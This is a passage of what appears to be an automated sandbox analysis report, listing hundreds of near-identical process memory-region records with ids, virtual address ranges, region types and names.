monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22744 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22745 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22746 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22747 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22748 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22749 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22750 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22751 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22752 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22753 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22754 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22755 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22756 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22757 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22758 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22759 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22760 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22761 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22762 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22763 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22764 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22765 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22766 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22767 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22768 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22769 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22770 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22771 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22772 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22773 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22774 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22775 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22776 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22777 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22778 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22779 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22780 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22781 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22782 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22783 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22784 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22785 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22786 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22787 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22788 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22789 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22790 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22791 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22792 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22793 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22794 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22795 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22796 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22797 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22798 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22799 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22800 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22801 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22802 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22803 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22804 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22805 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22806 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22807 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22808 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22809 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22810 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22811 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22812 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22813 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22814 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22815 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22816 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22817 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22818 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22819 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22820 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22821 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22822 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22823 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22824 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22825 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22826 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22827 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22828 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22829 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22830 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22831 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22832 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22833 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22834 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22835 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22836 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22837 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22838 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22839 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22840 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22841 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22842 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22843 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22844 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22845 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22846 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22847 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22848 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22849 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22850 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22851 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22852 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22853 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22854 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22855 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22856 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22857 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22858 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22859 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22860 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22861 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22862 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22863 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22864 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22865 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22866 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22867 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22868 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22869 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22870 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22871 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22872 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22873 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22874 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22875 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22876 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22877 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22878 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22879 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22880 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22881 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22882 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22883 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22884 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22885 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22886 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22887 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22888 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22889 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22890 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22891 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22892 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22893 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22894 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22895 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22896 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22897 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22898 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22899 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22900 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22901 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22902 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22903 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22904 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22905 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22906 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22907 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22908 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22909 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22910 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22911 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22912 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22913 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22914 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22915 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22916 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22917 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22918 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22919 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22920 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22921 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22922 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22923 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22924 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22925 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22926 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22927 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22928 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22929 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22930 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22931 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22932 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22933 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22934 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22935 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22936 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22937 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22938 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22939 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22940 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22941 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = 